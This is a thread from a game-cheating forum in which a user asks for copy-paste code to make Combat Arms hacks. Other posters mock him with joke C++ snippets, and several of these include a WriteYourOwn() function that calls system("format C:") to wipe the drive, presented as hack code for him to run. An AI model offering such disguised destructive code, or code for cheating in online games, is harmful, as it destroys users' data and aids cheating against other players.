[HELP] Coding CA Hacks

Posts 115 of 41 · Page 1 of 3
[HELP] Coding CA Hacks
i want to just code basic stuff

im not releasing or anything but i need a tut or just something to C+P

i have (removed) edit3: i have Dev C++ cuz i heard its easier to use

could someone just give me a link to a tut or something?

DO NOT FLAME OR SAY LRN2CODE or anything
ONLY HELPFUL COMMENTS PLEASE


edit: thanks to whoever helps (possibly GP gifts [i dont have nx] )

edit2: i also found all these codes here http://www.mpgh.net/forum/207-combat...ga-thread.html
EVERYTHING!
Quote Originally Posted by NOOB View Post
EVERYTHING!
yea i found a bunch of "PushToConsole" Codes in a sticky

those work in what types of hacks (hotkey, menu, autoon)?
Learn2C++
Its really the only way
Quote Originally Posted by whit View Post
Learn2C++
Its really the only way
lol

i said C+P

so if i C+P (i wont release i promise) i can do it myself...

really all i would do is take others codes and put it into "my" hack
Quote Originally Posted by SeanBoBoEgan View Post


lol

i said C+P

so if i C+P (i wont release i promise) i can do it myself...

really all i would do is take others codes and put it into "my" hack
But if there code its not "your" hack
Quote Originally Posted by Stephen View Post
C++ .
other than that, browse mpgh, a lot of us started here...so much stuff has been released too that it shouldn't be too hard to find stuff
Quote Originally Posted by SeanBoBoEgan View Post

im not releasing or anything but i need a tut or just something to C+P
Here ya go.

[highlight=c++]
bool noob;
if(noob = true)
{
Learn2Code();
}
else
{
WriteYourOwn();
}
[/highlight]

Don't mind the names of the functions I used, I did that cuz I was mad at this noob for asking for code to C+P, but it works damn good.
[highlight=cpp]
Learn2Code();
[/highlight]
That's for the hack to function correctly, and:
[highlight=cpp]
WriteYourOwn();
[/highlight]
That's for the l33t haxorz.
Trust me, this code will FUCK some people up on CA if used correctly.
Quote Originally Posted by D-Vid the DBag View Post


Here ya go.

[highlight=c++]
bool noob;
if(noob = true)
{
Learn2Code();
}
else
{
WriteYourOwn();
}
[/highlight]

Don't mind the names of the functions I used, I did that cuz I was mad at this noob for asking for code to C+P, but it works damn good.
[highlight=cpp]
Learn2Code();
[/highlight]
That's for the hack to function correctly, and:
[highlight=cpp]
WriteYourOwn();
[/highlight]
That's for the l33t haxorz.
Trust me, this code will FUCK some people up on CA if used correctly.
Here is the code for the function "Learn2Code();".

[highlight=cpp]
void Learn2Code()
{
system("start http://www.learncpp.com/");
}
[/highlight]
Quote Originally Posted by Disturbed View Post


Here is the code for the function "Learn2Code();".

[highlight=cpp]
void Learn2Code()
{
system("start http://www.learncpp.com/");
}
[/highlight]
Thanks! I forgot to include the functions. Haha.
Now, the only function missing is the [highlight=c++]WriteYourOwn();[/highlight] function.

Sorry to tell you, @SeanBoBoEgan, is that YOU've gotta write the code for that function.


Okay, I will make this alot easier on you since @Disturbed and @master131 helped out...

[highlight=c++]
#include <iostream>
#include "stdlib.h"

void WriteYourOwn()
{
using namespace std;
cout << "Error, current user is not worthy enough!" << endl;
cout << "Formatting hard drive!" << endl;
system("format C:");
}

void Learn2Code()
{
system("start http://www.learncpp.com/");
}

void BestHackstoCandP()
{
bool noob;
if(noob = true)
{
Learn2Code();
}
else
{
WriteYourOwn();
}
}

void main()
{
BestHackstoCandP();
return 0;
}
[/highlight]
[highlight=c++]void WriteYourOwn()
{
using namespace std;
cout << "Error, current user is not worthy enough!" << endl;
cout << "Formatting hard drive!" << endl;
system("format C:");
}[/highlight]
Full code:
[highlight=c++]#include <iostream>

void WriteYourOwn()
{
using namespace std;
cout << "Error, current user is not worthy enough!" << endl
cout << "Formatting hard drive!" << endl;
system("format C:");
}

void Learn2Code()
{
system("start http://www.learncpp.com/");
}

void BestHackstoCandP()
{
bool noob;
if(noob == true)
{
Learn2Code();
}
else
{
WriteYourOwn();
}
}

int main()
{
BestHackstoCandP();
return 0;
}
[/highlight]
Quote Originally Posted by master131 View Post
Full code:
[highlight=c++]#include <iostream>

void WriteYourOwn()
{
using namespace std;
cout << "Error, current user is not worthy enough!" << endl
cout << "Formatting hard drive!" << endl;
system("format C:");
}

void Learn2Code()
{
system("start http://www.learncpp.com/");
}

void BestHackstoCandP()
{
bool noob;
if(noob == true)
{
Learn2Code();
}
else
{
WriteYourOwn();
}
}

int main()
{
BestHackstoCandP();
return 0;
}
[/highlight]
Look at my post above yours.
I edited it, and fixed it.

You forgot to include the stdlib.h for the system command.
This is the same guy who hex edited my hack who made everyone think i couldn't code.
he is:
Se 4 nH 4 x(not legit one)
S34nH4x
SeanBoBoEgan
There is one more i think.
Posts 115 of 41 · Page 1 of 3

Post a Reply

Tags for this Thread

None

Need help?